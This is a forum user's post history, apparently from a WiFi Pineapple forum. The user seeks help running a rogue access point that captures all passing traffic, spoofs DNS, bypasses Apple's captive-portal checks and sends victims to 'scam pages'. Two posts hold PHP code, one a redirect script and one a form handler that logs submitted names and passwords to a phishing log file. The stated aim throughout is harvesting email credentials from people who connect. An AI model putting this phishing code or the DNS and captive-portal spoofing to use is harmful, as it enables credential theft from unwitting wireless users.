Jump to content

troter

Active Members
  • Posts

    20
  • Joined

  • Last visited

Everything posted by troter

  1. all point is use -d to store logs on the memory card (( found out that have to kill some processes before using it..
  2. well... root@Pineapple:~# airmon-ng stop mon0 Interface Chipset Driver wlan1 Realtek RTL8187L rtl8187 - [phy1] wlan0-1 Atheros AR9330 ath9k - [phy0] IEEE Unknown Unknown (MONITOR MODE NOT SUPPORTED) 802.11bgn Unknown Unknown (MONITOR MODE NOT SUPPORTED) ESSID:off/any Unknown Unknown (MONITOR MODE NOT SUPPORTED) wlan0 Atheros AR9330 ath9k - [phy0] anyone ? any suggestions ? anyone had any luck working via busybox ?
  3. firm-soft-ware is all up to date.. wlan1 is exactly same error root@Pineapple:~#: not found root@Pineapple:~#:Notice: bssid already given is it something im doing wrong ?
  4. root@Pineapple:~# iwconfig lo no wireless extensions. wlan1 IEEE 802.11bg ESSID:"xxx" Mode:Managed Frequency:2.412 GHz Access Point: xxx Bit Rate=36 Mb/s Tx-Power=27 dBm RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=47/70 Signal level=-63 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:1 Invalid misc:265 Missed beacon:0 wlan0-1 IEEE 802.11bgn ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=18 dBm RTS thr:off Fragment thr:off Encryption key:off Power Management:off wlan0 IEEE 802.11bgn Mode:Master Tx-Power=18 dBm RTS thr:off Fragment thr:off Power Management:off eth0 no wireless extensions. br-lan no wireless extensions.
  5. is it not more easy to download this file and store locally ? PS:Thanks for sharing folder images.. what is the correct place for it ? www/images ? is it possible to move to sd and make a link ?
  6. each time it trying to use ifconfig wlan0 up then pineapple crashes for 2-6 minutes.. ..after connecting back to pineapple it shows the same root@Pineapple:~# ifconfig br-lan Link encap:Ethernet HWaddr xxx inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:695 errors:0 dropped:214 overruns:0 frame:0 TX packets:128 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:68948 (67.3 KiB) TX bytes:34546 (33.7 KiB) eth0 Link encap:Ethernet HWaddr xxx UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:889 errors:0 dropped:55 overruns:0 frame:0 TX packets:128 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:101706 (99.3 KiB) TX bytes:34546 (33.7 KiB) Interrupt:4 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:164 errors:0 dropped:0 overruns:0 frame:0 TX packets:164 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:11637 (11.3 KiB) TX bytes:11637 (11.3 KiB) wlan0 Link encap:Ethernet HWaddr xxx UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) wlan1 Link encap:Ethernet HWaddr xxx inet addr:192.168.0.44 Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:63 errors:0 dropped:9 overruns:0 frame:0 TX packets:67 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:6755 (6.5 KiB) TX bytes:8064 (7.8 KiB) root@Pineapple:~# airodump-ng -c 11 --bssid xxx -d -w test1 mon0 root@Pineapple:~#: not found root@Pineapple:~# airodump-ng -c 11 --bssid xxx -d -w test1 mon0 root@Pineapple:~#:Notice: bssid already given no crash on wlan1 but it a same output root@Pineapple:~#: not found root@Pineapple:~#:Notice: bssid already given
  7. trying to use following airodump-ng -c 11 --bssid xx:xx:xx:xx -d -w test1 wlan0 getting error bssid already given ifconfig not showing mon0 not present what im doing wrong ?
  8. Hi! Anyone can help me please ? i need next things : 1) best way to create access point to share internet connection and collect all passing data including commands and and manual how to set it up 2) create static access point in no dog splash (or any other way) to collect phone number and a name of the connected client (i mean page with window asking if want to connect please live you phone number and name and will call you) Im newbe in all this and trying to understand how this things works Thanks
  9. need some advice .. i got 10 scam pages.. a.html, b.htmlc.html....j.html redirection is set up.. is it possible to user to browse i-net as normal via internet sharing and triger only on my 10 pages ? currently i have dns set up to *
  10. Hi! Please help me set pineapple ro auto-run dns spoof
  11. can u create DNS auto start function ? as it is not work without it...
  12. follow the white rabbit published posts
  13. Hi !! Lets discuss correct redirection in this topic Since iOS 7 blocked the spoofing of http://www.apple.com/library/test/success.html I start looking for another way to block the Captive Network Assistant login page. After some research i have found some alternative addresses ios uses www.appleiphonecell.com captive.apple.com captive.apple.com www.apple.com www.itools.info www.ibook.info www.airport.us www.thinkdifferent.us response is (apple.php) <HTML><HEAD><TITLE>Success</TITLE></HEAD><BODY>Success</BODY></HTML> Just not sure if i wrote redirect.php it the correct way <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "www.appleiphonecell.com")){ header('Status: 302 Found'); header('Location: apple.html'); } if (strpos($ref, "captive.apple.com")) { header('Status: 302 Found'); header('Location: apple.html'); } if (strpos($ref, "www.itools.info")) { header('Status: 302 Found'); header('Location: apple.html'); } if (strpos($ref, "www.ibook.info")) { header('Status: 302 Found'); header('Location: apple.html'); } if (strpos($ref, "www.airport.us")) { header('Status: 302 Found'); header('Location: apple.html'); } if (strpos($ref, "www.thinkdifferent.us")) { header('Status: 302 Found'); header('Location: apple.html'); }
  14. Thanks 4 replays After i made some research i realised 2 week point 1) Can not set up automatic DNS spoof (dips pins etc don't have any decent description i mean set up manual) 2) Browsers.. is another story.. a) Safary 502 Bad Gateway (nginx /1.2.2) Strange thing is : after i join network from iphone for a second i saw half login screen.. saying captive.apple.com Tony is name of my network anyone can explain ?? captive.apple.com anyone can explain ??? b) Opera .. is good.. mobile opera same as standard version PS: Just read this article http://stackoverflow.com/questions/19682624/bypasses-apple-captive-network-assistant-login-in-ios-7
  15. PS: when the client connects to wifi pineapple and entering 172.16.42.1 magic happened.. in any another case i mean if i type google yahoo or whatever im just getting blank screen... any one can help ??
  16. Hi again ! After reading several manuals regarding using fish catching i didnt get any luck with it (maybe coz mark IV and V is different ?) My target is to redirect all incoming traffic to index.html anyone can advise what im doing wrong plz ? my setting is below : DNS 172.16.42.1 * Index.php <html> <head> <meta http-equiv="REFRESH" content="0;url=redirect.php"> </head> <body> </body> </html> redirect.php <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "*")){ header('Home'); header('Location: index.html'); } require('error.php'); ?> error.php <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("/tmp/pineapple-phish.log", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><head> <script type="text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"> </body></html> when client connects to pineapple he getting blank page.. if internet present client is able to use it Ps: Karma is running Firmware Version: 2.1.1 PHP Version 5.4.5 System Linux Pineapple 3.3.8 #21 Tue Dec 9 16:16:09 PST 2014 mips Build Date Oct 9 2014 16:09:31
  17. Yes Sure bro. Tnks What i whant to do is next : i want to create a index.html page with post asking for the mail and pass. after user will connect and enter details ill just use redirect to google. will it work ?
  18. Merry xmass to all readers !!! After reading a lot of stuff about Mark V i finally got it but as all manuals related to mark IV im really stuck.. For example : http://hak5.org/hack/pineapple-phishing Can anyone explain what do i need to change to make it working on Mark V ? Thanks
×
×
  • Create New...